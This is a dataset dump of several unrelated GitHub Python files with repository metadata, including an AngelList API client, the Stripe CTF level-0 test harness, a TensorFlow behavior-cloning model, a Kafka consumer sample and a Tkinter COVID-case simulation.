def getTagsChildren(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s/children?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
# (GET) https://api.angel.co/1/tags/:id/parents
def getTagsParents(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s/parents?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
# (GET) https://api.angel.co/1/tags/:id/startups
def getTagsStartups(self, access_token = None, tag_id = None, order = None, per_page = None, page = None):
self.check_access_token(access_token)
url = '%s/1/tags/%s/startups?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
if order:
url = '%s&order=%s' % (url, order)
if per_page:
url = '%s&per_page=%s' % (url, per_page)
if page:
url = '%s&page=%s' % (url, page)
return self.do_get_request(url)
##########################################################
# Users (http://angel.co/api/spec/users)
# (GET) https://api.angel.co/1/users/:id
def getUsers(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/search
def getUsersSearch(self, access_token = None, slug = None, email = None):
self.check_access_token(access_token)
url = '%s/1/users/search?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if slug:
url = '%s&slug=%s' % (url, slug)
if email:
md5_hash = hashlib.md5(email).hexdigest()
url = '%s&md5=%s' % (url, md5_hash)
try:
results = self.do_get_request(url)
except:
# couldn't find any results so just return an empty object
results = json.loads('{}')
return results
# (GET) https://api.angel.co/1/me
def getMe(self, access_token = None):
self.check_access_token(access_token)
return self.do_get_request('%s/1/me?access_token=%s' % (self.API_ENDPOINT, self.access_token))
##########################################################
# Search (https://angel.co/api/spec/search)
# (GET) https://api.angel.co/1/search?query=:1&type=:2
def getSearch(self, access_token = None, query='', atype='User'):
self.check_access_token(access_token)
url = '%s/1/search?access_token=%s' % (self.API_ENDPOINT, self.access_token)
url = '%s&query=%s' % (url, query)
url = '%s&type=%s' % (url, atype)
url = url_fix(url)
try:
results = self.do_get_request(url)
except:
# couldn't find any results so just return an empty object
results = json.loads('{}')
return results, url
| [
"tmshu1@gmail.com"
] | tmshu1@gmail.com |
d0ddccb63a8286112433e6886535c15b78ec17a4 | 01c6f08f04a5aba3432a672744ad38b07b66cb24 | /tests/test_logic.py | 3c9bc6c23100bb411cca0ac4505621c9a1a70bf9 | [] | no_license | patnir/photo-translator | bced9fa5bf355a47ab1e468fde7cc571ef434389 | f4ce12f75f0f7e9cbb99192066ec026a91bc83e1 | refs/heads/main | 2023-03-17T23:42:50.964279 | 2021-03-17T06:27:20 | 2021-03-17T06:27:20 | 348,130,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from src.logic import translate_photo_contents_into_text
def test_translate():
assert translate_photo_contents_into_text("photo") == "text" | [
"test@tests-mbp.home"
] | test@tests-mbp.home |
5b5cabf08a29039bc59cd1bac436dc857eb9d0b4 | 7833b9033fd68713920b431b56d952ce1b26bf64 | /level0/test/lib/test_framework.py | a95c230d95a4896aa6339af1264722ccb345ae1d | [] | no_license | thbishop/stripe_ctf_3 | 15e7a302223d74e632a5a985024a91480bb04e48 | a05b6d9262a040164ff60b07a55489fdcfa00ba3 | refs/heads/master | 2020-04-01T08:32:29.006343 | 2014-01-31T18:18:42 | 2014-01-31T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,387 | py | import difflib
import os.path
from random import SystemRandom
import re
import subprocess
import sys
import time
# From this package
import lib.error as error
import lib.http_client as http_client
import lib.util as util
data_directory = os.path.join(os.path.dirname(__file__), "..", "data")
class TestCase(object):
def __init__(self, harness, id_or_url):
self.harness = harness
self.id, self.url = self.normalize_id_and_url(id_or_url)
self.json = None
def normalize_id_and_url(self, id_or_url):
if re.match("\Ahttps?:", id_or_url):
url = id_or_url
# Look at the last component and remove extension
id = id_or_url.split('/')[-1].split('.')[0]
else:
id = id_or_url
level = self.harness.LEVEL
url = "https://stripe-ctf-3.s3.amazonaws.com/level%s/%s.json" % (level, id)
return id, url
def dump_path(self):
return os.path.join(self.harness.test_cases_path(), self.id + ".json")
def load(self):
if self.json: return self.json
try:
f = open(self.dump_path(), "r")
self.json = util.json.load(f)
f.close()
return self.json
except IOError:
pass
util.logger.info('Fetching. URL: %s', self.url)
content = self.harness.fetch_s3_resource(self.url)
try:
self.json = util.json.loads(content)
except ValueError:
# Decoding the JSON failed.
msg = ("There was a problem parsing the test case. We expected "
"JSON. We received: %s" % (content,))
raise error.StripeError(msg)
return self.json
def flush(self):
f = open(os.path.join(self.harness.test_cases_path(), self.id + ".json"), "w")
util.json.dump(self.json, f)
f.close()
class AbstractHarness(object):
def __init__(self, ids_or_urls=[], options={}):
util.mkdir_p(self.test_cases_path())
if not os.path.isfile(http_client.certs_path()):
msg = ("You seem to have deleted the file of certificates "
"that shipped with this repo. It should exist "
"at %s" % http_client.certs_path())
raise error.StripeError(msg)
if ids_or_urls == []:
util.logger.info('No test case supplied. Randomly choosing among defaults.')
ids_or_urls = [SystemRandom().choice(self.DEFAULT_TEST_CASES)]
self.test_cases = map(lambda token: TestCase(self, token), ids_or_urls)
self.options = options
headers = {
'User-Agent': 'Stripe TestHarness/%s' % (self.VERSION,),
}
self.http_client = http_client.new_default_http_client(headers=headers, verify_ssl_certs=True)
def fetch_s3_resource(self, url):
try:
content, status_code = self.http_client.request("get", url)
except error.HTTPConnectionError:
err = util.exception_as()
msg = ("There was an error while connecting to fetch "
"the url %s. Please check your connectivity. If there "
"continues to be an issue, please let us know at "
"ctf@stripe.com. The specific error is:\n" % (url,))
raise error.StripeError(msg + str(err))
if status_code == 200:
return content
elif status_code == 403:
msg = ("We received a 403 while fetching the url %s. "
"This probably means that you are trying to get "
"something that doesn't actually exist." % (url,))
raise error.StripeError(msg)
else:
msg = ("We received the unexpected response code %i while "
"fetching the url %s." % (status_code, url,))
raise error.StripeError(msg)
def run(self):
task = self.options["task"]
if task == "execute":
test_cases_to_execute = self.load_test_cases()
self.execute(test_cases_to_execute)
else:
raise StandardError("Unrecognized task " + task)
def test_cases_path(self):
return os.path.join(
data_directory,
"downloaded_test_cases",
"version%i" % self.VERSION)
def flush_test_cases(self):
util.logger.info('Flushing. Path: %s', self.test_cases_path())
for test_case in self.test_cases:
test_case.flush(self.test_cases_path())
def add_test_case(self, test_case):
self.test_cases.append(test_case)
def load_test_cases(self):
loaded_test_cases = []
for test_case in self.test_cases:
result = test_case.load()
if not result: continue
test_case.flush()
loaded_test_cases.append(test_case)
return loaded_test_cases
def hook_preexecute(self):
# May override
pass
def execute(self, test_cases_to_execute):
self.hook_preexecute()
runner = self.hook_create_runner()
for test_case in test_cases_to_execute:
if self.options["raw"]:
util.logger.info(runner.run_test_case_raw(test_case.json))
else:
runner.run_test_case(test_case.json)
class AbstractRunner(object):
def __init__(self, options):
pass
# may override
def code_directory(self):
return os.path.join(os.path.dirname(__file__), "..")
def log_diff(self, benchmark_output, user_output):
util.logger.info("Here is the head of your output:")
util.logger.info(user_output[0:2000])
diff = list(difflib.Differ().compare(benchmark_output.splitlines(True),
user_output.splitlines(True)))
lines = filter(lambda line: line[0] != "?", diff[0:100])
util.logger.info("\n***********\n")
util.logger.info("Here is the head of the diff between your output and the benchmark:")
util.logger.info("".join(lines))
def run_build_sh(self):
util.logger.info("Building your code via `build.sh`.")
build_runner = subprocess.Popen([
os.path.join(self.code_directory(), "build.sh")],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Blocks
stdout, stderr = build_runner.communicate()
if build_runner.returncode == 0:
util.logger.info("Done building your code.")
else:
util.logger.info("Build failed with code %i. Stderr:", build_runner.returncode)
util.logger.info(stderr)
# may override
def hook_prerun(self):
pass
def run_test_case(self, test_case):
self.hook_prerun()
id = test_case['id']
util.logger.info("About to run test case: %s" % id)
input = test_case['input']
result = self.run_input(input)
return self.report_result(test_case, result)
def run_test_case_raw(self, test_case):
self.hook_prerun()
input = test_case['input']
result = self.run_input(input)
return result['output']
def run_input(self, input):
util.logger.info("Beginning run.")
output = self.run_subprocess_command(self.subprocess_command(), input)
util.logger.info('Finished run')
return output
def report_stderr(self, stderr):
if not stderr: return
util.logger.info("Standard error from trial run:")
util.logger.info(stderr)
def subprocess_communicate(self, runner, input):
if sys.version_info >= (3, 0):
input = input.encode('utf-8')
stdout, stderr = runner.communicate(input)
if sys.version_info >= (3, 0):
stderr = stderr.decode('utf-8')
stdout = stdout.decode('utf-8')
return stdout, stderr
def run_subprocess_command(self, command, input):
start_time = time.time()
runner = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = self.subprocess_communicate(runner, input)
end_time = time.time()
return {
'wall_clock_time': end_time - start_time,
'output': stdout,
'input': input,
'level': self.LEVEL,
'exitstatus': runner.returncode,
}
| [
"bishop.thomas@gmail.com"
] | bishop.thomas@gmail.com |
ee3bd0fd9cd417e9f857dba2376e138ca1a6af7b | f9e2a4f93e7c18390052b87a45f199abce817ffe | /lib/python3.6/reprlib.py | eb5fd636821e416479b02e063c128c24a74e831a | [] | no_license | tunaho/Seng2021 | e356e820458b65a3382671dc9c5810acf9db4b83 | 8be83cf2ada6a069d5b67f9f731bf30b85e8afef | refs/heads/master | 2021-09-15T06:48:48.956845 | 2018-05-28T02:52:05 | 2018-05-28T02:52:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | C:/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/reprlib.py | [
"z5160298@ad.unsw.edu.au"
] | z5160298@ad.unsw.edu.au |
55dd3bb40f27748ad37544434f81d3b3f8af7dbc | ee9d0897c1dfc9a7570dd482056ff174d2bf3cf1 | /twitter/rest-api/lib/python2.7/linecache.py | 742c382c3f110230e34c834dc845d977e9603178 | [] | no_license | ravneetg/mids-w205-2 | 15fbd7d7356fa9ff8cf808a6a2cc9ed75114ee4c | 796d07ad7ff53ff3350fa8b184b9c3d2be0ff795 | refs/heads/master | 2020-07-04T11:44:41.459445 | 2016-12-18T08:34:44 | 2016-12-18T08:34:44 | 67,957,203 | 0 | 1 | null | 2016-12-18T08:34:44 | 2016-09-11T22:15:03 | null | UTF-8 | Python | false | false | 47 | py | /home/blue/anaconda2/lib/python2.7/linecache.py | [
"ravneetghuman@ischool.berkeley.edu"
] | ravneetghuman@ischool.berkeley.edu |
4d38f7bb468beb4ae0d12208543491dffacf5088 | fc93328977a795b72b3d2b4b9ba3d5656e3a3145 | /bc/model.py | fc0f1217c125aed27218e37296fda571977b9f4e | [] | no_license | Recharrs/bc | cbd06b841005fae713b874b845c27f4e39a25414 | c4cebf5ba1475954453a98ca36f376ba4139e168 | refs/heads/master | 2020-03-28T23:48:02.900041 | 2018-10-24T09:40:15 | 2018-10-24T09:40:15 | 149,309,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | import numpy as np
import tensorflow as tf
class Model:
def __init__(self, state_dim, action_dim, restore_path=None):
self.sess = tf.get_default_session()
self.state_dim = state_dim
self.action_dim = action_dim
''' Build Model '''
with tf.variable_scope("model") as scope:
self.s = tf.placeholder(tf.float32, [None, self.state_dim])
self.a = tf.placeholder(tf.float32, [None, self.action_dim])
h1 = tf.layers.dense(self.s, 64, activation=tf.nn.relu)
h2 = tf.layers.dense(h1, 64, activation=tf.nn.relu)
mu = tf.layers.dense(h2, self.action_dim)
sigma = tf.layers.dense(h2, self.action_dim)
pd = tf.contrib.distributions.MultivariateNormalDiag(loc=mu, scale_diag=sigma)
self.a_pred = pd.sample()
''' Loss & Opt '''
self.loss = tf.losses.mean_squared_error(labels=self.a, predictions=self.a_pred)
tf.summary.scalar("loss", self.loss)
self.train_op = tf.train.AdamOptimizer(learning_rate=3e-4).minimize(self.loss)
''' Summary '''
self.summary = tf.summary.merge_all()
def train(self, batch_s, batch_a):
''' action should be normalized to [-1, 1]'''
loss, summary, _ = self.sess.run(
[self.loss, self.summary, self.train_op], feed_dict={
self.s: batch_s,
self.a: batch_a,
})
return loss, summary
def predict(self, s):
action = self.sess.run([self.a_pred], feed_dict={
self.s: s
})
return action
| [
"sliz97028@gmail.com"
] | sliz97028@gmail.com |
24ce46c3f2cdf6328f9ad6f2523d90a5c1357fab | a9adcb5efb4492094ecd9e45741b409afca56f53 | /democratizing_weather_data/streaming/sample_code/sample_consumer.py | 11bae809c233d80495b34da49e9d8ab418dbe20b | [] | no_license | LeoSalemann/democratizing_weather_data | 0792a4419a67799f8f5b60585a6ec32aab72c4c6 | 55d84e8bc3748b0df166d5f2c999bd7906cff1f5 | refs/heads/master | 2021-05-05T10:03:39.234295 | 2017-09-19T01:58:41 | 2017-09-19T01:58:41 | 104,013,673 | 0 | 0 | null | 2017-09-19T02:05:05 | 2017-09-19T02:05:05 | null | UTF-8 | Python | false | false | 822 | py | import sys
import logging
import multiprocessing
from kafka import KafkaConsumer
class Consumer(multiprocessing.Process):
def __init__(self, topic_name):
self.topic_name = topic_name
daemon = True
def run(self):
consumer = KafkaConsumer(bootstrap_servers='localhost:9092',
auto_offset_reset='earliest')
consumer.subscribe(self.topic_name)
for message in consumer:
print (message)
def main():
topic_name = sys.argv[1:]
consumer = Consumer(topic_name)
consumer.run()
time.sleep(10)
if __name__ == "__main__":
logging.basicConfig(
format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',
level=logging.INFO
)
main()
| [
"leo.salemann@me.com"
] | leo.salemann@me.com |
4e26bbd2df58bab646493c8d01198a36113d012b | 8b99655d0c3920143aa3a0945f05e7d16526788a | /python基础/异常捕获.py | a54adadeae5439d13f481cd08fb5ce153802a54d | [] | no_license | nicecode996/Python_Test | 8e79373db83caf39521425b2be16416655d3ae8e | 7a26b44cbb9e72c1039ed6c0e4961c4b35472192 | refs/heads/master | 2023-08-16T00:27:03.029817 | 2021-09-27T14:55:01 | 2021-09-27T15:18:20 | 410,270,104 | 0 | 0 | null | 2021-09-26T15:16:31 | 2021-09-25T12:44:03 | Python | UTF-8 | Python | false | false | 533 | py | #! usr/bin/env python3
# coding=utf-8
# try:
# num1 = int(input("输入一个整数:"))
# num2 = int(input("输入一个整数:"))
# print(num1/num2)
# except ValueError:
# print("请输入数值型")
# except ZeroDivisionError:
# print("除数不为0")
# else:
# print("程序没有异常")
# x = 5
# if x > 1:
# raise Exception("这是一个异常")
class MyException(Exception):
def __init__(self,value1,value2):
self.value1 = value1
self.value2 = value2
raise MyException("JJJJ")
| [
"19913148542@163.com"
] | 19913148542@163.com |
1217dc9aad892ceabb4e39f38732b3be4c7fcb2f | 15f0322573b8b1b1668c248a428fa27d2244ab99 | /glug/views.py | 41e2cd5d3e88ee2607ebf455b812061ee5d22540 | [] | no_license | spoorthis12/my-first-blog | b2465a37c48cbadf36f9ff607e4428e42f499fb7 | 882ce2702bc3b0691d6d324bc214800157f23abe | refs/heads/master | 2021-01-10T03:42:45.123150 | 2016-03-09T01:12:50 | 2016-03-09T01:12:50 | 53,430,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | from django.shortcuts import render
# Create your views here.
def post_list(request):
return render(request, 'glug/post_list.html', {})
| [
"universalgreen1972@gmail.com"
] | universalgreen1972@gmail.com |
4dce6aca511eb41feeab368a9e2aa4e6b425ce74 | 22535a06ed985cd10048055bb310e9204d95702e | /module_3/zad_98/homework_1/main.py | d3b3e46ff68066e6bd1560473773ed79a5e7744d | [] | no_license | Nanutu/python-poczatek | 56f077f54d5e8a29405addbe53c9d5826542ade2 | af219febb62b1f76435365ca7a2a7797d2fd01d7 | refs/heads/master | 2023-02-15T07:09:37.098394 | 2021-01-08T02:06:53 | 2021-01-08T02:06:53 | 314,753,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,831 | py | # Wykorzystaj metodę super do odwołania się z poziomu klasy ExpressOrder do bazowej implementacji metody total_price i
# zastąp powtórzony w klasie potomnej algorytm wynikiem z tego odwołania.
#
# Pamiętaj, że łączna wartość zamówienia ekspresowego to:
# # łączna wartość zamówienia policzona według bazowej metody + opłata za ekspresową dostawę.
from shop.data_generator import generate_order_elements
from shop.discount_policy import PercentageDiscount, AbsoluteDiscount
from shop.order import Order
from shop.express_order import ExpressOrder
def run_homework():
order_elements = generate_order_elements(11)
five_percent_discount = PercentageDiscount(discount_percentage=5)
hundred_pln_discount = AbsoluteDiscount(discount_value=100)
order = Order(client_first_name="Maciej", client_last_name="Xyz", order_elements=order_elements)
order_5_percent = Order(client_first_name="Maciej", client_last_name="Xyz", order_elements=order_elements,
discount_policy=five_percent_discount)
order_100 = Order(client_first_name="Maciej", client_last_name="Xyz", order_elements=order_elements,
discount_policy=hundred_pln_discount)
express_order = ExpressOrder(delivery_date="20th December 2020", client_first_name="Maciej",
client_last_name="Sobieszuk", order_elements=order_elements)
express_order_discount = ExpressOrder(delivery_date="20th December 2020", client_first_name="Maciej",
client_last_name="Sobieszuk", order_elements=order_elements, discount_policy=hundred_pln_discount)
print(order)
print(order_5_percent)
print(order_100)
print(express_order)
print(express_order_discount)
if __name__ == '__main__':
run_homework()
| [
"maciek.sobieszuk@gmail.com"
] | maciek.sobieszuk@gmail.com |
3e328de1c0c7c548ffcdc4dfe4245b69fc6a10cf | c5fb1b19dfb2e09a467b82312bc543b41bf09311 | /venv/bin/jupyter-notebook | 14402b5b0089189da18a0938bc5d0478fa3df764 | [] | no_license | jkam32/python_playground | badb8a281ca4c11155bd2ab8fca94bfc7c2f5097 | ef90dd29ddbd633e03caa273ee9adcb983444911 | refs/heads/master | 2020-03-27T20:32:35.407852 | 2018-09-30T09:20:35 | 2018-09-30T09:20:35 | 147,076,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | #!/home/js/PycharmProjects/python_playground/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from notebook.notebookapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jkam32@siswa.um.edu.my"
] | jkam32@siswa.um.edu.my | |
8c0c4481c0dcb0f0acdf102417132479cee97925 | 3e8ad0a8c52996d614dfc868f1431d7e71ac85d9 | /src/input_data.py | 3c9e9b1e5b28e6fcb8e2b35bb834e5e18c5af50a | [] | no_license | seraphium/neural-networks-and-deep-learning | a6ecc825a865fdbc883db72172f0b9d5b49d0e51 | 230f295026295694c95a06f3fb98c3fc67e2fae2 | refs/heads/master | 2021-01-23T06:19:49.776857 | 2017-04-10T16:49:21 | 2017-04-10T16:49:21 | 86,352,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,227 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for downloading and reading MNIST data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data", one_hot=True) | [
"viperking@163.com"
] | viperking@163.com |
28adf6066f1298f7c1751bea4082fea4e3ed1570 | f44a5803dbfa854de26d354f9e8db0f808d304f8 | /tp3.py | 651e553182f15955f5f51b48d2816b23e38ea3d9 | [] | no_license | MartinA731/Covid-Simulation | 5100b7375293271487eca955469e3d8baeddcca0 | 58baf2877f76b99281c68610884c2fb24b7cb16d | refs/heads/main | 2023-02-10T19:40:37.084687 | 2020-12-26T23:26:18 | 2020-12-26T23:26:18 | 324,649,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,655 | py | import pandas as pd
from cmu_112_graphics import *
from tkinter import *
import states
import random
def appStarted(app):
app.countyCalculated = False
app.firstStep = True
app.charsCalculated = False
app.pos = []
app.R = 4
app.showVisualization = False
app.correctInput = True
app.timerDelay = 1000
app.blueCircles = []
app.redCircles = []
app.numBlueCircles = 0
app.numRedCircles = 0
app.dirX = "right"
app.dirY = "up"
def createPosn(app, cases, deaths):
for i in range(cases):
cx = random.randint(0, app.width)
cy = random.randint(int(app.height/10), app.height)
color = "blue"
app.pos.append([cx,cy,color,-1,"right","up"])
app.blueCircles.append([cx,cy,color,-1])
app.numBlueCircles = len(app.blueCircles)
for i in range(deaths):
cx = random.randint(0, app.width)
cy = random.randint(int(app.height/10), app.height)
color = "red"
app.pos.append([cx,cy,color,-1,"right","up"])
app.redCircles.append([cx,cy,color,-1])
app.numRedCircles = len(app.redCircles)
for pos in app.pos:
if(pos[2] == "blue"):
pos[3] += 1
if(pos[3] >= 14):
app.pos.remove(pos)
def moveCircles(app):
movementX = app.width // 20
movementY = app.height // 20
for circle in app.pos:
if(circle[4] == "right"):
circle[0] += random.randint(0,movementX)
if(circle[4] == "left"):
circle[0] -= random.randint(0,movementX)
if(circle[5] == "up"):
circle[1] -= random.randint(0,movementY)
if(circle[5] == "down"):
circle[1] += random.randint(0,movementY)
if(circle[0] >= app.width):
circle[4] = "left"
if(circle[0] <= 0):
circle[4] = "right"
if(circle[1] <= app.width//10):
circle[5] = "down"
if(circle[1] >= app.height):
circle[5] = "up"
def findCircles(app):
createPosn(app, app.increasesCasesL[0])
def timerFired(app):
if(app.countyCalculated):
createPosn(app, app.increasesCasesL[0] - app.increasesDeathsL[0],
app.increasesDeathsL[0])
app.increasesCasesL.pop(0)
app.increasesDeathsL.pop(0)
moveCircles(app)
app.datesL.pop(0)
def createInputLocation(app):
app.root = Tk()
title = Label(app.root, text="County Selector", font="Arial 15 bold")
title.pack()
#first
textBox1Label = Label(app.root, text='Enter your state name', width=50, height=10)
textBox1Label.pack()
app.textBox1 = Text(app.root, height=5, width=20)
app.textBox1.pack()
textBox2Label = Label(app.root, text="Enter your county name", width=50, height=10)
textBox2Label.pack()
app.textBox2 = Text(app.root, height=5, width=20)
app.textBox2.pack()
button = Button(app.root, height=1, width=10, text="select",
command=lambda: getInputsLocation(app))
button.pack()
mainloop()
def getInputsLocation(app):
app.inputState = app.textBox1.get("1.0","end-1c")
app.inputCounty = app.textBox2.get("1.0","end-1c")
app.root.destroy()
getCountyData(app)
app.countyCalculated = True
def getCountyData(app):
countyData = r'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv'
readableData = pd.read_csv(countyData)
app.state_data = readableData[readableData['state'] == app.inputState]
app.county = app.state_data[app.state_data['county'] == app.inputCounty]
createLists(app)
totals(app)
increases(app)
analysisIncreasesCases(app)
app.loadingCalculating = False
def createLists(app):
app.datesL = []
app.countiesL = []
app.statesL = []
app.casesL = []
app.deathsL = []
for date in app.county.date:
app.datesL.append(date)
if(len(app.datesL) == 0):
app.correctInput = False
return
else:
app.correctInput = True
for county in app.county.county:
app.countiesL.append(county)
for state in app.county.state:
app.statesL.append(state)
for cases in app.county.cases:
app.casesL.append(cases)
for deaths in app.county.deaths:
app.deathsL.append(deaths)
def totals(app):
app.totalRecorded = len(app.datesL)
app.totalCases = app.casesL[len(app.casesL) -1]
app.totalDeaths = app.deathsL[len(app.deathsL) - 1]
def increases(app):
app.increasesCasesL = []
app.increasesDeathsL = []
#first recordings have increase of 0
app.increasesCasesL.append(0)
app.increasesDeathsL.append(0)
#increase in cases list
for i in range(1, len(app.casesL)):
increase = app.casesL[i] - app.casesL[i-1]
app.increasesCasesL.append(increase)
#increase in deaths list
for j in range(1, len(app.deathsL)):
increase = app.deathsL[j] - app.deathsL[j-1]
app.increasesDeathsL.append(int(increase))
def avgIncreaseCases(app, n):
sumIncreasesCases = 0
lengthCases = len(app.increasesCasesL)
for i in range(lengthCases - n, lengthCases):
sumIncreasesCases += app.increasesCasesL[i]
avgIncCases = sumIncreasesCases / n
return avgIncCases
def avgIncreaseDeaths(app,n):
sumIncreasesDeaths = 0
lengthDeaths = len(app.increasesDeathsL)
for i in range(lengthDeaths - n, lengthDeaths):
sumIncreasesDeaths += app.increasesDeathsL[i]
avgIncDeaths = sumIncreasesDeaths / n
return avgIncDeaths
def analysisIncreasesCases(app):
app.last12WeeksInc = 0
startPoint = len(app.increasesCasesL) - 84
endPoint = len(app.increasesCasesL)
for i in range(startPoint, endPoint):
app.last12WeeksInc += app.increasesCasesL[i]
app.last4WeeksInc = 0
startPoint = len(app.increasesCasesL) - 28
for i in range(startPoint, endPoint):
app.last4WeeksInc += app.increasesCasesL[i]
startPoint = len(app.increasesCasesL) - 7
app.lastWeekInc = 0
for i in range(startPoint, endPoint):
app.lastWeekInc += app.increasesCasesL[i]
app.weekToMonth = app.lastWeekInc / app.last4WeeksInc
app.monthTo3Months = app.last4WeeksInc / app.last12WeeksInc
def keyPressed(app, event):
if(event.key == "1" and app.countyCalculated == False):
app.firstStep = False
createInputLocation(app)
if(not app.correctInput and event.key == "s"):
createInputLocation(app)
if(event.key == "2" and app.charsCalculated == False):
app.firstStep = False
import groceryStore
if(event.key == "3"):
import visual
if(event.key == "b" and app.countyCalculated or app.charsCalculated):
runApp(width=1500, height=1500)
if(event.key == "n" and app.countyCalculated):
app.showVisualization = True
def announcements(app, canvas):
if(app.firstStep):
canvas.create_rectangle(0,0,app.width,app.height,fill="yellow")
canvas.create_text(app.width/2, app.height/10,
text='What do you want to do?',
font='Arial 30 bold')
canvas.create_text(app.width/2, app.height/3,
text='1) Calculate detailed location data by county',
font='Arial 20 bold')
canvas.create_text(app.width/2, app.height/2,
text='2) Start grocery store simulation',
font='Arial 20 bold')
canvas.create_text(app.width/2, 2*app.height/3,
text='3) Start general infection simulation',
font='Arial 20 bold')
def drawCountyCalcs(app,canvas):
if(not app.showVisualization):
canvas.create_rectangle(0,0,app.width,app.height,fill="green")
canvas.create_text(app.width/2, app.height/8,
text='Calculated risk based on county location: ',
font='Arial 20 bold')
canvas.create_text(app.width/2, app.height/4,
text="Over the last week, there are " +
str(app.lastWeekInc) + " cases.",
font='Arial 15 bold')
canvas.create_text(app.width/2, 3*app.height/8,
text="Over the last 4 weeks, there are " +
str(app.last4WeeksInc) + " cases.",
font='Arial 15 bold')
canvas.create_text(app.width/2, app.height/2,
text="Over the last 12 weeks, there are " +
str(app.last12WeeksInc) + " cases.",
font='Arial 15 bold')
canvas.create_text(app.width/2, 5*app.height/8,
text="The cases from the last week account for " +
str(round(app.weekToMonth*100,3)) + "%" +
" of the cases from the last 4 weeks." ,
font='Arial 15 bold')
canvas.create_text(app.width/2, 3*app.height/4,
text="The cases from the last 4 weeks account for " +
str(round(app.monthTo3Months*100,3)) + "%" +
" of the cases from the last 12 weeks." ,
font='Arial 15 bold')
canvas.create_text(app.width/2, 7*app.height/8,
text="press 'n' to look at visual" ,
font='Arial 10 bold')
def drawCharsCalcs(app, canvas):
canvas.create_text(app.width/2, 7*app.height/8,
text=str(app.worseConds) + str(app.betterConds),
font='Arial 10 bold')
def drawVisualization(app, canvas):
canvas.create_rectangle(0,0,app.width,app.height,fill="orange")
for circle in app.pos:
cx0 = circle[0] - app.R
cy0 = circle[1] - app.R
cx1 = circle[0] + app.R
cy1 = circle[1] + app.R
color = circle[2]
canvas.create_oval(cx0,cy0,cx1,cy1,fill=color)
canvas.create_text(app.width/2, app.height/20,
text="There were " + str(app.numBlueCircles) +
" (blue) active cases and " + str(app.numRedCircles) +
" (red) deaths in " + str(app.inputCounty) +
" county, " + str(app.inputState) + " during " +
str(app.datesL[0]),
font='Arial 10 bold')
canvas.create_text(app.width/2, 7*app.height/8,
text="press 'b' to return to start" ,
font='Arial 10 bold')
def drawCorrectInput(app,canvas):
canvas.create_rectangle(0,0,app.width,app.height,fill="orange")
canvas.create_text(app.width/2,app.height/2,text="""Invalid state and/or
county, press s to try again""", font="Arial 25 bold")
def redrawAll(app,canvas):
announcements(app,canvas)
if(app.countyCalculated):
drawCountyCalcs(app, canvas)
if(app.showVisualization):
drawVisualization(app,canvas)
if(app.charsCalculated):
drawCharsCalcs(app,canvas)
if(not app.correctInput):
drawCorrectInput(app,canvas)
runApp(width=1500, height=1500) | [
"noreply@github.com"
] | noreply@github.com |
2b12a582682d85608b392f14ce3177ebc146e1d6 | 25cf3a270879dc1d14c258be9b09964ae97cc6f3 | /Homework6/Homework6.py | b61ae8612042f565cbff8c270edef4e293030ca5 | [] | no_license | Zxr1230/cs677 | 58b048429cf028c51df9e6bbdd913d041ea951f9 | f8b232356e99b674205a6001aef7756e99b666be | refs/heads/master | 2020-06-19T22:09:06.331194 | 2019-04-30T01:01:34 | 2019-04-30T01:01:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,411 | py | """
Jimmy Goddard
3/9/19
CS 677 Assignment 6
"""
import datetime
import os
import platform
import statistics
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from pandas_datareader import data as web
HEADER_LONG = 'Long_MA'
HEADER_SHORT = 'Short_MA'
HEADER_WEEK = 'Week'
HEADER_RETURN = 'Return'
HEADER_DATE = 'Date'
HEADER_AVG = 'Rolling AVG'
HEADER_SD = 'Rolling SD'
